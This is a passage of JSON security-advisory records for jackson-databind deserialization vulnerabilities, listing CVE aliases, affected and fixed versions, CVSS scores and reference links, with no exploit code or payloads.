{ "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0445" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0164" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0161" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0160" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0159" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2019-11-13T00:30:39Z", "nvd_published_at": "2019-10-01T17:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-fqwf-pjwf-7vqv", "published": "2020-05-15T18:59:04Z", "modified": "2024-07-03T21:22:37.578162Z", "aliases": [ "CVE-2020-10673" ], "summary": "jackson-databind mishandles the interaction between serialization gadgets and typing", "details": "FasterXML jackson-databind 2.x before 2.9.10.4 and 2.6.7.4 mishandles the interaction between serialization gadgets and typing, related to com.caucho.config.types.ResourceRef (aka caucho-quercus).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.9.10.4" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", 
"2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-fqwf-pjwf-7vqv/GHSA-fqwf-pjwf-7vqv.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.4" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-fqwf-pjwf-7vqv/GHSA-fqwf-pjwf-7vqv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-10673" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2660" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": 
"https://lists.debian.org/debian-lts-announce/2020/03/msg00027.html" }, { "type": "WEB", "url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200403-0002" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-04-22T20:59:03Z", "nvd_published_at": "2020-03-18T22:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-gjmw-vf9h-g25v", "published": "2019-11-13T00:32:38Z", "modified": "2024-03-16T05:19:37.211801Z", "aliases": [ "CVE-2019-17531" ], "summary": "jackson-databind polymorphic typing issue", "details": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 prior to 2.9.10.1, 2.8.11.5, and 2.6.7.3. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the apache-log4j-extra (version 1.2.x) jar in the classpath, and an attacker can provide a JNDI service to access, it is possible to make the service execute a malicious payload. 
", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.1" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/11/GHSA-gjmw-vf9h-g25v/GHSA-gjmw-vf9h-g25v.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.8.11.5" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/11/GHSA-gjmw-vf9h-g25v/GHSA-gjmw-vf9h-g25v.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.6.7.3" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", 
"2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/11/GHSA-gjmw-vf9h-g25v/GHSA-gjmw-vf9h-g25v.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-17531" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2498" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20191024-0005" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/12/msg00013.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r392099ed2757ff2e383b10440594e914d080511d7da1c8fed0612c1f@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b3c90d38f99db546de60fea65f99a924d540fae2285f014b79606ca5@%3Ccommits.pulsar.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0445" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0164" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0161" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0160" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0159" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:4192" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2019-11-13T00:30:58Z", "nvd_published_at": "2019-10-12T21:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-gwp4-hfv6-p7hw", "published": "2019-08-01T19:18:06Z", "modified": "2024-03-13T05:27:58.436849Z", "aliases": [ "CVE-2019-14439" ], "summary": "Deserialization of untrusted data in FasterXML jackson-databind", "details": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9.2, 2.8.11.4, 2.7.9.6, and 2.6.7.3. 
This occurs when Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the logback jar in the classpath.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.9.2" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/08/GHSA-gwp4-hfv6-p7hw/GHSA-gwp4-hfv6-p7hw.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.4" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/08/GHSA-gwp4-hfv6-p7hw/GHSA-gwp4-hfv6-p7hw.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.6" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/08/GHSA-gwp4-hfv6-p7hw/GHSA-gwp4-hfv6-p7hw.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.6.7.3" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/08/GHSA-gwp4-hfv6-p7hw/GHSA-gwp4-hfv6-p7hw.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-14439" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2389" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/ad418eeb974e357f2797aef64aa0e3ffaaa6125b" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ee0a051428d2c719acfa297d0854a189ea5e284ef3ed491fa672f4be@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { 
"type": "WEB", "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00011.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OVRZDN2T6AZ6DJCZJ3VSIQIVHBVMVWBL" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXRVXNRFHJSQWFHPRJQRI5UPMZ63B544" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Oct/6" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190814-0001" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4542" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/940b4c3fef002461b89a050935337056d4a036a65ef68e0bbd4621ef@%3Cdev.struts.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/87e46591de8925f719664a845572d184027258c5a7af0a471b53c77b@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5fc0e16b7af2590bf1e97c76c136291c4fdb244ee63c65c485c9a7a1@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5ecc333113b139429f4f05000d4aa2886974d4df3269c1dd990bb319@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/56c8042873595b8c863054c7bfccab4bf2c01c6f5abedae249d914b9@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3f99ae8dcdbd69438cb733d745ee3ad5e852068490719a66509b4592@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/34717424b4d08b74f65c09a083d6dd1cb0763f37a15d6de135998c1d@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2d2a76440becb610b9a9cb49b15eac3934b02c2dbcaacde1000353e4@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0d4b630d9ee724aee50703397d9d1afa2b2befc9395ba7797d0ccea9@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3200" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2019-08-01T15:37:50Z", "nvd_published_at": "2019-07-30T11:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-gww7-p5w4-wrfv", "published": "2020-03-04T20:52:11Z", "modified": "2024-03-15T01:05:18.790961Z", "aliases": [ "CVE-2019-20330" ], "summary": "Deserialization of Untrusted Data in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.6.7.4, 2.7.x before 2.7.9.7, 2.8.x before 2.8.11.5, and 2.9.x before 2.9.10.2 lacks certain `net.sf.ehcache` blocking.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": 
"pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.4" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.6.7.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/03/GHSA-gww7-p5w4-wrfv/GHSA-gww7-p5w4-wrfv.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.7" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.9.6", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/03/GHSA-gww7-p5w4-wrfv/GHSA-gww7-p5w4-wrfv.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.5" } ] } ], "versions": [ "2.8.0", "2.8.1", 
"2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.8.11.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/03/GHSA-gww7-p5w4-wrfv/GHSA-gww7-p5w4-wrfv.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.2" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/03/GHSA-gww7-p5w4-wrfv/GHSA-gww7-p5w4-wrfv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-20330" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2526" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/eb254813cc822d0af015ce8fe05febf50721dc53" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r909c822409a276ba04dc2ae31179b16f6864ba02c4f9911bdffebf95@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra2e572f568de8df5ba151e6aebb225a0629faaf0476bf7c7ed877af8@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/ra5ce96faec37c26b0aa15b4b6a8b1cbb145a748653e56ae83e9685d0@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra8a80dbc7319916946397823aec0d893d24713cbf7b5aee0e957298c@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb532fed78d031fff477fd840b81946f6d1200f93a63698dae65aa528@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd1f346227e11fc515914f3a7b20d81543e51e5822ba71baa0452634a@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd49cfa41bbb71ef33b53736a6af2aa8ba88c2106e30f2a34902a87d2@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd6c6fef14944f3dcfb58d35f9317eb1c32a700e86c1b5231e45d3d0b@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfa57d9c2a27d3af14c69607fb1a3da00e758b2092aa88eb6a51b6e99@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00020.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200127-0004" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.10.1...jackson-databind-2.9.10.2" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r107c8737db39ec9ec4f4e7147b249e29be79170b9ef4b80528105a2d@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2c77dd6ab8344285bd8e481b57cf3029965a4b0036eefccef74cdd44@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r392099ed2757ff2e383b10440594e914d080511d7da1c8fed0612c1f@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3f8180d0d25a7c6473ebb9714b0c1d19a73f455ae70d0c5fefc17e6c@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r428735963bee7cb99877b88d3228e28ec28af64646455c4f3e7a3c94@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r50f513772f12e1babf65c7c2b9c16425bac2d945351879e2e267517f@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5c14fdcabdeaba258857bcb67198652e4dce1d33ddc590cd81d82393@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 